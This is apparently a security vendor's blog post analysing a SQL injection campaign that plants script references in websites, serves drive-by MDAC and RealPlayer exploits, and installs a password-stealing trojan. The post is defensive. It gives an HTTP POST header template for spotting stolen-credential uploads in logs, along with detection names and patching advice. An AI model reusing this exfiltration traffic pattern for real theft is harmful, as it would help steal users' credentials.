TrustedSource™ Blog

Latest Wave of SQL Injection Attacks

Since April, about every week had its run of SQL injection attacks, infecting legitimate websites to direct visitors to malicious code. And like before, this latest wave also tries to infect visitors of legitimate websites with a password-stealing trojan.

The attackers continue to use SQL injection against ASP and ASP.NET websites that have insufficient verification of user input. Some useful links for IIS web server administrators are

• “SQL Injection Attacks on IIS Web Servers” and
• “How To: Protect From SQL Injection in ASP.NET“

Upon successful infection, the legitimate site contains an injected SCRIPT reference pointing to the malicious server hosted in Beijing, China. The SCRIPT references are injected mainly into the TITLE elements of websites, but not exclusively there. Also, many websites have been hit twice or more by the infection, which leads to two SCRIPT references overwriting each other.

The infection seems to continue steadily; as per Google query (returning the results of infected sites a couple of days ago), the number of infections has grown from 6,000 to 8,500 within nothing but 12 hours. This steady infection is probably due to usage of an attack toolkit, rather than a Worm component.

The malicious website performs drive-by infection via at least an MDAC exploit (MS06-014) that comes in two differently obfuscated scripts, and exploits for two RealPlayer vulnerabilities. Both are not zero-day vulnerabilities, staying up-to-date with patches already helps a lot.

Upon successful drive-by infection, a downloader and backdoor malware is installed on the victim’s PC. Names of infected PCs are also reported back to the attacker’s server. The downloader then downloads a second-stage malware executable as instructed by the attacker.

As of this writing, this second-stage malware is a Trojan Dropper that installs a Password-Stealing spyware. The dropper unpacks two (UPX-packed) libraries from its resources and registers them with the victim’s system. Injecting its code into Internet Explorer, it tries to steal user credentials for the World of Warcraft online game, but also for popular web mail sites.

Data is transmitted back to a server hosted in Beijing, China. Network administrators can check log files for outgoing HTTP POST requests that fit this scheme:

POST … HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; …; SV1; MyIE2)
Host: …
Content-Length: …
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDACQADRDT=AMCJBFJAKJAPMNIKCDENGIIB

The exploits used for initial drive-by infection are proactively blocked by the Secure Anti-Malware Engine as “Script.Rce.Gen” and “Script.Agent.ES”, respectively. The first-stage downloader is blocked proactively as “Trojan.Crypt.NSPM.Gen”, and the second-stage dropper and spyware is proactively detected as “Trojan.Dropper.Gen”.

Home users are urged to keep their Windows systems patched, and their Anti-Virus up-to-date. Also keep an eye on the 3rd party software installed on your system - like music and video players, PDF readers, and so on. These need to be kept up-to-date, too.

Both the MDAC and RealPlayer vulnerabilities currently used in this attack are located in ActiveX controls, so using a web browser like Firefox that doesn’t support ActiveX can help further. Yet the times when “simply” staying on known, legitimate websites, and not surfing to “shady” sites as a basic computer hygiene rule seem to be over. Be careful when “Save As” dialog boxes pop up even on legitimate websites, asking where to save some executable, and better directly cancel and leave that site.

Back to TrustedSource™ Blog overview